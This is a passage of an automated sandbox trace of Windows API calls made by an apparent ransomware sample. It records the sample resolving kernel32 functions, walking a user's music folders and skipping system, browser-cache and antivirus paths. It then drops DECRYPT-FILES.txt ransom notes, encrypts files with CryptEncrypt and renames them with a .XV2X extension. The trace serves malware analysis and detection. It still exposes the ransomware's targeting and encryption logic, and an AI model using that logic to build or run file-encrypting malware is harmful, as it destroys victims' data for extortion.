lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.811] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.811] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.811] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.811] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.811] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.811] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.811] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.811] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.811] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.811] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.811] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.811] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.811] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.811] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.811] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.811] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.811] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.811] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.812] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.812] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.812] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.812] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.812] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.812] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.812] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.812] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.812] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.812] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.812] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.812] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.812] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.812] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.812] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.812] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.812] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.812] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.812] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.812] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.812] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.812] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.812] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.812] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.812] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.812] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.813] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\qD8wKNVWw-K1Oehbsb.m4a") returned 83 [0085.813] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\qD8wKNVWw-K1Oehbsb.m4a.XV2X") returned 88 [0085.813] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\qD8wKNVWw-K1Oehbsb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\qd8wknvww-k1oehbsb.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\qD8wKNVWw-K1Oehbsb.m4a.XV2X" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\qd8wknvww-k1oehbsb.m4a.xv2x"), dwFlags=0x0) returned 1 [0085.813] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.813] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.814] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.814] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0d13dd0, ftCreationTime.dwHighDateTime=0x1d4c774, ftLastAccessTime.dwLowDateTime=0xf52274e0, ftLastAccessTime.dwHighDateTime=0x1d4cc90, ftLastWriteTime.dwLowDateTime=0xf52274e0, ftLastWriteTime.dwHighDateTime=0x1d4cc90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkSCcRt5MdQwSoZl", cAlternateFileName="SKSCCR~1")) returned 1 [0085.814] lstrcmpW (lpString1="SkSCcRt5MdQwSoZl", lpString2=".") returned 1 [0085.814] lstrcmpW (lpString1="SkSCcRt5MdQwSoZl", lpString2="..") returned 1 [0085.814] lstrcatW (in: lpString1="SkSCcRt5MdQwSoZl", lpString2="\\" | out: lpString1="SkSCcRt5MdQwSoZl\\") returned="SkSCcRt5MdQwSoZl\\" [0085.814] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="SkSCcRt5MdQwSoZl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\" [0085.814] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\Program Files") returned 0x0 [0085.814] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch=":\\Windows") returned 0x0 [0085.814] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\Games\\") returned 0x0 [0085.814] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\Tor Browser\\") returned 0x0 [0085.814] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\ProgramData\\") returned 0x0 [0085.814] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0085.814] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0085.814] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0085.814] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\All Users") returned 0x0 [0085.814] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\IETldCache\\") returned 0x0 [0085.814] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\Local Settings\\") returned 0x0 [0085.814] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="\\AppData\\Local") returned 0x0 [0085.814] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="AhnLab") returned 0x0 [0085.815] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0085.815] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned 78 [0085.815] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.815] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\\\jkbimi8.tmp") returned 90 [0085.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\sksccrt5mdqwsozl\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x438 [0085.816] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned 78 [0085.816] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0085.816] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\\\DECRYPT-FILES.txt") returned 96 [0085.816] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\sksccrt5mdqwsozl\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0085.817] WriteFile (in: hFile=0x43c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0085.818] CloseHandle (hObject=0x43c) returned 1 [0085.818] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned 78 [0085.818] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\*" [0085.818] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0d13dd0, ftCreationTime.dwHighDateTime=0x1d4c774, ftLastAccessTime.dwLowDateTime=0xaf593640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf593640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b58 [0085.818] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.818] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0d13dd0, ftCreationTime.dwHighDateTime=0x1d4c774, ftLastAccessTime.dwLowDateTime=0xaf593640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf593640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.818] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.818] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.818] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf593640, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf593640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf593640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0085.818] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0085.818] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x591f2090, ftCreationTime.dwHighDateTime=0x1d4d463, ftLastAccessTime.dwLowDateTime=0x9b95c700, ftLastAccessTime.dwHighDateTime=0x1d4c9a8, ftLastWriteTime.dwLowDateTime=0x9b95c700, ftLastWriteTime.dwHighDateTime=0x1d4c9a8, nFileSizeHigh=0x0, nFileSizeLow=0x16d1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="fRU1utAoUZpSLIvF.mp3", cAlternateFileName="FRU1UT~1.MP3")) returned 1 [0085.818] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3", lpString2="DECRYPT-FILES.txt") returned 1 [0085.818] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3", lpString2="autorun.inf") returned 1 [0085.818] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3", lpString2="boot.ini") returned 1 [0085.818] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3", lpString2="desktop.ini") returned 1 [0085.819] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3", lpString2="ntuser.dat") returned -1 [0085.819] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3", lpString2="iconcache.db") returned -1 [0085.819] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3", lpString2="bootsect.bak") returned 1 [0085.819] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3", lpString2="ntuser.dat.log") returned -1 [0085.819] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3", lpString2="thumbs.db") returned -1 [0085.819] lstrcmpiW (lpString1="fRU1utAoUZpSLIvF.mp3", lpString2="Bootfont.bin") returned 1 [0085.819] lstrlenW (lpString="fRU1utAoUZpSLIvF.mp3") returned 20 [0085.819] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0085.819] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0085.819] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0085.819] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0085.819] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned 78 [0085.819] lstrlenW (lpString="fRU1utAoUZpSLIvF.mp3") returned 20 [0085.819] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\" [0085.819] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\", lpString2="fRU1utAoUZpSLIvF.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\fRU1utAoUZpSLIvF.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\fRU1utAoUZpSLIvF.mp3" [0085.819] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.819] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\fRU1utAoUZpSLIvF.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\sksccrt5mdqwsozl\\fru1utaouzpslivf.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0085.819] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=93467) returned 1 [0085.819] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0085.820] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.820] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.820] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.820] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.820] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0085.820] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0085.822] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.822] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.823] CloseHandle (hObject=0x444) returned 1 [0085.823] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.823] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0085.824] CloseHandle (hObject=0x0) returned 0 [0085.824] CloseHandle (hObject=0x440) returned 1 [0085.824] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.824] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.825] GetTickCount () returned 0x114de8d [0085.825] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.825] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.825] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.825] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.825] lstrlenA (lpString="kernel32.dll") returned 12 [0085.826] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.826] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.826] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.826] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.826] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.826] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.826] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.826] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.826] lstrlenA (lpString="ADDATOMA") returned 8 [0085.826] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.826] lstrlenA (lpString="ADDATOMW") returned 8 [0085.826] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.826] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.826] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.826] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.826] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.826] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.826] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.826] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.826] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.826] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.826] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.826] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.826] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: 